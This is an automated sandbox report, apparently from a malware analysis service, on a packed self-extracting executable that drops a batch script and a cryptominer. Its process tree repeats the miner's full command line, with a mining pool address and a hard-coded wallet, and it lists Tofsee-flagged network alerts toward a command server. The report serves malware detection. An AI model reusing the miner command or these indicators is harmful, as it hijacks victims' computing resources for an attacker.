Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 24, 2024, 7:44 a.m.	June 24, 2024, 7:46 a.m.

Size	4.8MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`1fecbc51b5620e578c48a12ebeb19bc2`
SHA256	`9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a`
CRC32	`5CE2F5CC`
ssdeep	`98304:6qwWqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMg:6qwWqw0v7DnZu5NnobnDtl4TjZ8X1/Qf`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

pic1.exe "C:\Users\test22\AppData\Local\Temp\pic1.exe"
2556
- cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\RarSFX0\1.bat" "
  2736
  - rolex.exe rolex.exe -priverdD
    2804
explorer.exe C:\Windows\Explorer.EXE
1452
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2864
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1168
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
3040
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1240
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2084
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2244
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2576
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1788
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1352
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2360
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2288
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1848
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1376
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2164
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2656
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1800
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2768
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1064
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2644
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2000
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1432
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
3036
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1268
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2652
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2052
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2516
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2612
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1892
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1304
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1952
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2596
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2440
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2216
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2708
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1120
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2704
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2424
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1772
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
2036
Driver.exe "C:\Users\test22\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 1
1040

Name	Response	Post-Analysis Lookup
cv99160.tw1.ru	A 92.53.96.121	92.53.96.121

IP Address	Status	Action
164.124.101.2	Active	Moloch
92.53.96.121	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49178 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49177 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49190 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49176 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49174 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49196 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49207 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49182 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49180 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49197 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49188 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49183 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49199 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49219 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49200 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49192 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49175 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49234 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49205 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49245 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49214 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49229 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49259 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49236 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49222 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49240 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49272 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49258 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49226 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49247 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49273 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49263 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49231 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49248 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49276 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49278 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49237 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49253 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49282 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49244 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49261 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49285 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49250 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49266 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49251 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49283 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49255 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49293 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49256 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49303 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49268 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49305 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49179 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49298 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49275 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49189 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49286 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49299 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49193 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49296 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49302 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49216 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49300 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49309 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49223 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49308 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49310 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49185 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49224 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49318 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49233 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49238 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49271 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49289 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49291 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49292 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49186 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49195 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49210 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49213 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49217 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49220 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49227 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49241 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49243 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49262 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49265 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49269 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49279 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49281 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49288 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49295 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49306 -> 92.53.96.121:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.didat
section	_RDATA

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (39 events)

Time & API	Arguments	Status
